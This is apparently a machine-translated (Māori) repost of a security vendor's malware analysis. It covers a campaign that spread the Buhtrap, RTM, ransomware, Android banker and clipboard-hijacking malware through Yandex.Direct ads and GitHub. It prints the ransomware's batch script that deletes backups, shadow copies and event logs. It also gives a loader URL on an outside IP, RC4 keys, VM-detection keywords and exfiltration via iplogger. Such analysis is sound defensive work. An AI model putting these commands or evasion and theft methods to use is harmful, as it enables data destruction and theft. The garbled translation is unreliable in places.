Ki te aro ki nga kaikaute i roto i te whakaeke ipurangi, ka taea e koe te whakamahi i nga tuhinga mahi e rapu ana ratou mo te ipurangi. Koinei te mahi a tetahi roopu ipurangi i nga marama kua hipa, e tohatoha ana i nga kuaha o muri. и , me nga whakamuna me nga rorohiko mo te tahae i nga moni crypto. Ko te nuinga o nga whaainga kei Russia. I mahia te whakaeke ma te tuku panui kino ki runga i a Yandex.Direct. I tukuna te hunga mate pea ki te paetukutuku i tonohia kia tango i tetahi konae kino kua huna hei tauira tuhinga. I tangohia e Yandex nga panui kino i muri i ta maatau whakatupato.
Ko te waehere puna a Buhtrap kua patai ki runga ipurangi i nga ra o mua kia taea e te tangata te whakamahi. Kaore he korero mo te waatea o te waehere RTM.
I tenei pou ka korerotia e matou ki a koe me pehea te tohatoha o nga kaiwhaiwhai i te malware ma te whakamahi i te Yandex.Direct me te manaaki i a GitHub. Ka mutu te panui me te tātari hangarau o te malware.
Kua hoki mai a Buhtrap me RTM ki te pakihi
Te tikanga o te horapa me nga patunga
Ko nga momo utu utu ka tukuna ki nga patunga he rite tonu te tikanga whakatōpū. Ko nga konae kino katoa i hangaia e nga kaiwhaiwhai i tukuna ki roto i nga putunga rereke e rua o GitHub.
Ko te tikanga, kei roto i te putunga kotahi te konae kino ka taea te tango, he maha nga huringa. I te mea ka taea e GitHub te tiro i nga hitori o nga huringa ki tetahi putunga, ka kite tatou he aha te malware i tohatohahia i roto i tetahi waa. Hei whakatenatena i te tangata i pa ki te tango i te konae kino, i whakamahia te paetukutuku blanki-shabloni24[.]ru, e whakaatuhia ana i te ahua o runga ake nei.
Ko te hoahoa o te pae me nga ingoa katoa o nga konae kino e whai ana i te kaupapa kotahi - nga puka, nga tauira, nga kirimana, nga tauira, me era atu. I te whakaaro kua whakamahia kētia te rorohiko Buhtrap me te RTM ki nga whakaeke i nga kaikaute i nga wa o mua, i whakaaro matou ko te he rite tonu te rautaki i roto i te pakanga hou. Ko te patai anake ko te pehea i tae ai te patunga ki te waahi o te hunga whakaeke.
Te mate
I te iti rawa he maha o nga patunga kua tae mai ki runga i tenei pae i arohia e nga panui kino. Kei raro nei he tauira URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Ka kite koe i te hono, i whakairihia te kara ki runga i te huinga kaute tika bb.f2[.]kz. He mea nui kia mahara ko nga kara i puta ki runga i nga waahi rereke, he rite tonu te id whakahau a te katoa (blanki_rsya), me te nuinga e pa ana ki nga ratonga kaute, awhina ture ranei. Ko te URL e whakaatu ana i whakamahia e te kaipahua te tono "tikiake puka nama," e tautoko ana i to maatau whakapae mo nga whakaeke kua whaaia. Kei raro ko nga waahi i puta ai nga kara me nga patai rapu e pa ana.
- tikiake puka nama – bb.f2[.]kz
- tauira kirimana - Ipopen[.]ru
- tauira amuamu tono - 77metrov[.]ru
- puka whakaaetanga - blank-dogovor-kupli-prodazhi[.]ru
- tauira petihana kooti - zen.yandex[.]ru
- tauira amuamu - yurday[.]ru
- tauira puka kirimana – Regforum[.]ru
- puka kirimana – assistentus[.]ru
- tauira kirimana whare - napravah[.]com
- tauira o nga kirimana ture - avito[.]ru
Ko te pae blanki-shabloni24[.]ru pea i whirihorahia kia puta he aromatawai tirohanga ngawari. Ko te tikanga, ko te panui e tohu ana ki tetahi pae ahua ngaio me te hono ki a GitHub ehara i te ahua kino. I tua atu, i tukuna e nga kaiwhaiwhai nga konae kino ki te putunga mo te wa poto noa, tera pea i te wa o te pakanga. I te nuinga o nga wa, kei roto i te putunga GitHub he puranga zip putunga, he konae EXE patea ranei. Na, ka taea e nga kaiwhaiwhai te tohatoha panui ma te Yandex.Direct i runga i nga waahi i torohia e nga kaikaute i tae mai hei whakautu ki nga uiuinga rapu motuhake.
I muri mai, me titiro ki nga momo utu utu kua tohatohahia penei.
Tātari Utu
Te wa o te tohatoha
I timata te pakanga kino i te mutunga o Oketopa 2018 me te kaha i te wa e tuhi ana. I te mea kei te waatea te katoa o te putunga i runga i te GitHub, i whakahiatohia e matou he raarangi tika mo te tohatoha o nga whanau kino e ono (tirohia te ahua i raro nei). Kua taapirihia e matou he raina e whakaatu ana i te wa i kitea ai te hononga haki, i inehia e te ESET telemetry, hei whakataurite ki te hitori git. Ka taea e koe te kite, he pai te hono ki te waatea o te utu i runga i te GitHub. Ko te rereketanga i te mutunga o Hui-tanguru ka taea te whakamarama i te mea kaore he waahanga o te hitori huringa na te mea i tangohia te putunga mai i GitHub i mua i te whiwhinga katoa.
Whakaahua 1. Ko te wa o te horapa o te malware.
Tiwhikete Waitohu Waehere
I whakamahia e te pakanga nga tiwhikete maha. Ko etahi i hainatia e te nuinga o te whanau malware, e tohu ana he rereke nga tauira no te kaupapa kotahi. Ahakoa te waatea o te taviri tūmataiti, kaore nga kaiwhakahaere i haina nahanaha i nga tohu-rua me te kore whakamahi i te ki mo nga tauira katoa. I te mutunga o Hui-tanguru 2019, ka tiimata te hunga whakaeke ki te hanga hainatanga muhu ma te whakamahi i te tiwhikete a Google kaore i a raatau te kii motuhake.
Ko nga tiwhikete katoa e uru ana ki roto i te kaupapa whakahau me nga whanau malware ka hainatia e ratou kei te rarangi i raro nei.
I whakamahia ano e matou enei tiwhikete hainatanga waehere ki te whakarite hononga ki etahi atu whanau kino. Mo te nuinga o nga tiwhikete, kaore i kitea e matou nga tauira kaore i tohatohahia ma te putunga putunga GitHub. Heoi, i whakamahia te tiwhikete TOV "MARIYA" ki te haina i te malware no te botnet , hokohoko me nga kaikeri. Kaore pea e pa ana tenei malware ki tenei pakanga. Ko te mea pea, i hokona te tiwhikete i runga i te kupenga pouri.
Win32/Filecoder.Buhtrap
Ko te waahanga tuatahi i aro ki a maatau ko te Win32/Filecoder.Buhtrap hou i kitea. He konae rua Delphi tenei ka kohia i etahi wa. I tohatohahia i te Hui-tanguru–Maehe 2019. He rite te ahua ki te kaupapa ransomware - ka rapu i nga puku o te rohe me nga kōpaki whatunga me te whakamuna i nga konae kua kitea. Kare e hiahiatia he hononga Ipurangi ki te whakararu na te mea karekau e whakapā atu ki te tūmau ki te tuku kī whakamunatanga. Engari, ka taapirihia he "tohu" ki te mutunga o te karere utu, me te whakaaro ki te whakamahi i te imeera me te Bitmessage ki te whakapā atu ki nga kaiwhakahaere.
Hei whakamuna i te maha o nga rauemi tairongo ka taea, ka whakahaere a Filecoder.Buhtrap i tetahi miro i hangaia hei kati i nga rorohiko matua tera pea he tuwhera nga kaikawe konae kei roto nga korero nui ka raru te whakamunatanga. Ko te nuinga o nga mahinga ko nga punaha whakahaere papaa raraunga (DBMS). I tua atu, ka whakakorehia e te Filecoder.Buhtrap nga konae rangitaki me nga taapiri kia uaua ai te whakaora raraunga. Ki te mahi i tenei, whakahaere i te tuhinga puranga kei raro nei.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap e whakamahi ana i tetahi ratonga IP Logger ipurangi tika i hangaia hei kohikohi korero mo nga manuhiri paetukutuku. Ko te tikanga tenei ki te whai i nga patunga o te ransomware, ko te kawenga o te raina whakahau:
mshta.exe "javascript:document.write('');"
Ka tohua nga konae mo te whakamunatanga ki te kore e taurite ki nga rarangi whakakore e toru. Tuatahi, ko nga konae me nga toronga e whai ake nei kaore i whakamunatia: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys me .pekapeka. Tuarua, ko nga konae katoa kei roto i te ara katoa nga aho whaiaronga mai i te rarangi i raro nei ka waiho hei kape.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Tuatoru, ka whakakorehia etahi ingoa konae mai i te whakamunatanga, i roto i era ko te ingoa konae o te karere utu. Ko te rarangi kei raro nei. Ko te tikanga, ko enei tuunga katoa he mea kia mau tonu te mahi o te miihini, engari he iti noa te huarahi.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Kaupapa whakamunatanga kōnae
Ina oti ana, ka mahia e te malware he takirua matua RSA 512-bit. Ka whakamunatia te taunga tūmataiti (d) me te kōwae (n) ki te kī tūmatanui 2048-bit (te taupū tūmatanui me te modulus), kikī-zlib, me te base64 kua whakawaeheretia. Ko te waehere hei kawenga mo tenei ka whakaatuhia i te Whakaahua 2.
Whakaahua 2. Te hua o te whakahiatotanga o nga hihi-Hex-Rays o te 512-bit RSA tukanga whakaputa takirua matua.
Kei raro nei he tauira o te kuputuhi tokau me tetahi taviri motuhake i hangaia, he tohu e piri ana ki te karere utu.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Kei raro iho nei te kī tūmatanui a te hunga whakaeke.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Ka whakamunatia nga konae ma te whakamahi i te AES-128-CBC me te kii moka-256. Mo ia kōnae whakamunatia, ka hangaia he taviri hou me tetahi vector arawhiti hou. Ka taapirihia nga korero matua ki te mutunga o te konae whakamunatia. Kia whai whakaaro tatou ki te whakatakotoranga o te konae whakamunatia.
Ko nga konae kua whakamunatia te pane e whai ake nei:
Ko nga raraunga puna puna me te taapiri o te uara makutu VEGA kua whakamunatia ki nga paita 0x5000 tuatahi. Ko nga korero wetemunatanga katoa kua piri ki tetahi konae me te hanganga e whai ake nei:
- Kei roto i te tohu rahi kōnae he tohu e tohu ana he nui ake te konae i te 0x5000 paita te rahi
— Puka matua AES = ZlibCompress(RSAEncrypt(Kī AES + IV, kī tūmatanui o te takirua kī RSA i hangaia))
- RSA key blob = ZlibCompress(RSAEncrypt(whakatupuria te kī tūmataiti RSA, te kī tūmatanui RSA kua pakeke))
Win32/ClipBanker
Ko Win32/ClipBanker tetahi waahanga i tohatohahia mai i te mutunga o Oketopa ki te timatanga o Hakihea 2018. Ko tana mahi ko te aro turuki i nga korero o te papatopenga, e rapu ana i nga wahitau o nga pukoro cryptocurrency. I te whakatau i te wahitau putea kua whakaritea, ka whakakapihia e ClipBanker ki tetahi wahitau e whakaponohia ana no nga kaiwhakahaere. Ko nga tauira i akohia e matou kaore i te pouaka, kaore ano i whakapouritia. Ko te tikanga anake hei huna i te whanonga ko te whakamunatanga aho. Ka whakamunatia nga wahitau putea a te kaiwhakahaere ma te whakamahi RC4. Ko nga moni crypto ko te Bitcoin, Bitcoin cash, Dogecoin, Ethereum me Ripple.
I roto i te wa e horapa ana te malware ki nga putea Bitcoin a te hunga whakaeke, he iti te moni i tukuna ki te VTS, e ruarua ana mo te angitu o te pakanga. I tua atu, karekau he taunakitanga e kii ana he hononga enei whakawhitinga ki a ClipBanker.
Win32/RTM
I tohatohahia te waahanga Win32/RTM mo etahi ra i te timatanga o Maehe 2019. Ko te RTM he putea Torotiana i tuhia ki Delphi, e whai ana ki nga punaha putea mamao. I te 2017, ka whakaputaina e nga kairangahau ESET o tenei kaupapa, he mea tika tonu te whakaahuatanga. I te Hanuere 2019, i tukuna ano a Palo Alto Networks .
Putapu utauta
Mo etahi wa, i watea mai he kaikoeke i runga i te GitHub kaore i rite ki nga taputapu Buhtrap o mua. Ka huri ia ki https://94.100.18[.]67/RSS.php?<some_id> ki te tiki i te waahanga e whai ake nei ka utaina tika ki te mahara. Ka taea e tatou te wehewehe i nga whanonga e rua o te waahanga tuarua. I te URL tuatahi, i tukuna tika e RSS.php te Buhtrap backdoor - he rite tonu tenei tatau ki muri ki tera e waatea ana i muri i te tukunga o te waehere puna.
He mea whakamiharo, ka kite tatou i nga kaupapa maha me te Buhtrap backdoor, a e kiia ana kei te whakahaerehia e nga kaiwhakahaere rereke. I tenei keehi, ko te rereketanga nui ko te utaina o muri ka utaina tika ki te mahara me te kore e whakamahi i te kaupapa o mua me te tukanga tuku DLL i korerohia e matou. . I tua atu, i hurihia e nga kaiwhakahaere te matua RC4 i whakamahia hei whakamuna i nga hokohoko whatunga ki te tūmau C&C. I roto i te nuinga o nga kaupapa kua kitea e matou, kaore nga kaiwhakahaere i raru ki te whakarereke i tenei ki.
Ko te whanonga tuarua, he uaua ake, ko te RSS.php URL i tukuna ki tetahi atu uta. I whakatinanahia e ia etahi obfuscation, penei i te hanga ano i te tepu kawemai hihiri. Ko te kaupapa o te bootloader he whakapā atu ki te tūmau C&C [.]com/api/F27F84EDA4D13B15/2, tukuna nga poro ka tatari mo te whakautu. Ka tukatukahia te whakautu hei pupuhi, ka utaina ki te mahara ka mahia. Ko te utunga i kitea e matou e mahi ana i tenei kaiuta he rite tonu te tatau o muri o te Buhtrap, engari tera pea etahi atu waahanga.
Android/Spy.Banker
He mea whakamiharo, i kitea ano tetahi waahanga mo te Android i roto i te putunga putunga GitHub. Ko ia i roto i te peka matua mo te ra kotahi anake - Noema 1, 2018. I tua atu i te whakairinga ki runga i te GitHub, karekau e kitea e te waea a ESET he tohu mo te tohatoha o tenei kino.
I whakahaerehia te waahanga hei Painga Taupānga Android (APK). Kua tino whakapouritia. Kei te huna te whanonga kino i roto i te JAR whakamunatia kei roto i te APK. Kua whakamunatia ki te RC4 ma te whakamahi i tenei ki:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Ko te matua me te algorithm e whakamahia ana hei whakamuna i nga aho. Kei roto a JAR APK_ROOT + image/files. Kei roto i nga paita tuatahi e 4 o te konae te roa o te JAR whakamunatia, ka timata i muri tonu i te mara roa.
I te wetewete i te konae, ka kitea e matou ko Anubis - i mua putea mo te Android. Kei te malware nga ahuatanga e whai ake nei:
- hopuoro hopuoro
- tango screenshots
- whiwhi taunga GPS
- keylogger
- whakamunatanga raraunga taputapu me te tono utu
- te tuku pāme
He mea whakamiharo, i whakamahia e te kaipupuri putea a Twitter hei hongere whakawhitiwhiti korero mo te tiki i tetahi atu tūmau C&C. Ko te tauira i wetewetehia e maatau te whakamahi i te kaute @JonesTrader, engari i te wa o te tātari kua aukatihia.
Kei roto i te peeke he rarangi o nga tono whaainga i runga i te taputapu Android. He roa ake i te rarangi i whiwhi i te ako a Sophos. Kei roto i te rarangi te maha o nga tono putea, nga kaupapa hokohoko ipurangi penei i a Amazon me eBay, me nga ratonga cryptocurrency.
MSIL/ClipBanker.IH
Ko te waahanga whakamutunga i tohatohahia hei waahanga o tenei kaupapa ko te .NET Windows executable, i puta i Maehe 2019. Ko te nuinga o nga putanga i akohia he mea kiki ki te ConfuserEx v1.0.0. Pērā i a ClipBanker, ka whakamahia e tenei waahanga te papatopenga. Ko tana whainga ko te whānuitanga o nga moni crypto, me nga tuku i runga i te Steam. I tua atu, ka whakamahia e ia te ratonga IP Logger ki te tahae i te matua WIF tūmataiti Bitcoin.
Nga Tikanga Tiaki
I tua atu i nga painga e whakaratohia ana e ConfuserEx ki te aukati i te patuiro, te whakaheke, me te raweke, kei roto i te waahanga te kaha ki te kite i nga hua wheori me nga miihini mariko.
Hei manatoko kei te rere i roto i te miihini mariko, ka whakamahia e te malware te raina whakahau Windows WMI (WMIC) kua hangaia hei tono korero BIOS, ara:
wmic bios
Na ka tohatohahia e te papatono te putanga whakahau me te rapu kupu matua: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Hei kite i nga hua wheori, ka tukuna e te malware he tono Windows Management Instrumentation (WMI) ki te Windows Security Center ma te whakamahi ManagementObjectSearcher API e whakaatuhia ana i raro nei. Whai muri i te wetewete mai i te base64 ka penei te ahua o te waea:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Whakaahua 3. Te tukanga mo te tautuhi i nga hua wheori.
I tua atu, ka tirohia e te malware mena , he taputapu hei whakamarumaru i nga whakaeke papatopenga, a, ki te rere, ka whakatarewa i nga miro katoa i roto i taua mahi, na reira ka whakakorehia te whakamarumaru.
Te manawanui
Ko te putanga o te malware i akohia e matou he kape ano %APPDATA%googleupdater.exe ka tautuhi i te huanga "huna" mo te whaiaronga google. Na ka huri ia i te uara SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell i roto i te rehita Windows me te taapiri i te ara updater.exe. Ma tenei ara, ka mahia te malware i nga wa katoa ka uru mai te kaiwhakamahi.
Te whanonga kino
Pērā i a ClipBanker, ka aro turukihia e te malware nga ihirangi o te papatopenga me te rapu i nga wahitau putea moni crypto, a ka kitea, ka whakakapihia ki tetahi o nga wahitau o te kaiwhakahaere. Kei raro nei te rarangi o nga wahitau kua whakaritea i runga i nga mea e kitea ana i roto i te waehere.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Mo ia momo waahi noho he korero rite tonu. Ka whakamahia te uara STEAM_URL ki te whakaeke i te punaha Steam, ka kitea mai i te kii auau e whakamahia ana ki te tautuhi i roto i te putunga:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Hongere tangohanga
I tua atu i te whakakapi i nga wahitau i roto i te kaitarai, ka aro te malware ki nga taviri WIF motuhake o Bitcoin, Bitcoin Core me Electrum Bitcoin putea. Ka whakamahia e te hotaka plogger.org hei hongere tangohanga kia whiwhi i te taviri tūmataiti WIF. Hei mahi i tenei, ka taapirihia e nga kaiwhakahaere nga raraunga matua motuhake ki te pane HTTP Kaiwhakamahi-Agent, penei i raro nei.
Whakaatu 4. IP Logger papatohu me nga raraunga whakaputa.
Kaore nga kaiwhakahaere i whakamahi iplogger.org ki te whakakore i nga putea. He rereke pea ta raatau mahi na te 255 te rohe o te waahi o te mara User-Agentka whakaatuhia ki te atanga tukutuku IP Logger. I roto i nga tauira i akohia e matou, ko tetahi atu tūmau putanga i rongoa i roto i te taurangi taiao DiscordWebHook. He mea whakamiharo, kaore tenei taurangi taiao i whakawhiwhia ki hea i roto i te waehere. E tohu ana tenei kei te whanake tonu te kino, ka tautapa te taurangi ki te miihini whakamatautau a te kaiwhakahaere.
He tohu ano kei te whanake te kaupapa. E rua nga URL iplogger.org kei roto i te konae rua, a ka pataia nga mea e rua ina tangohia nga raraunga. I roto i te tono ki tetahi o enei URL, ko te uara i te mara Kaitohu kei mua i te "DEV /". I kitea ano e matou he putanga karekau i kohia ma te whakamahi i te ConfuserEx, ko te kaiwhiwhi mo tenei URL ko DevFeedbackUrl te ingoa. I runga i te ingoa rereke o te taiao, e whakapono ana matou kei te whakamahere nga kaiwhakahaere ki te whakamahi i te ratonga tika a Discord me tana punaha wawaotanga paetukutuku ki te tahae i nga putea cryptocurrency.
mutunga
Ko tenei kaupapa he tauira mo te whakamahi i nga ratonga panui tika i roto i nga whakaeke ipurangi. Ko te kaupapa e aro ana ki nga whakahaere a Ruhia, engari kaore matou e miharo ki te kite i taua whakaeke ma te whakamahi i nga ratonga kore-Rusia. Hei karo i te whakaraerae, me tino maia nga kaiwhakamahi ki te ingoa o te puna o te rorohiko ka tangohia e ratou.
He rarangi katoa o nga tohu o te taupatupatu me nga huanga MITER ATT&CK e waatea ana i .
Source: will.com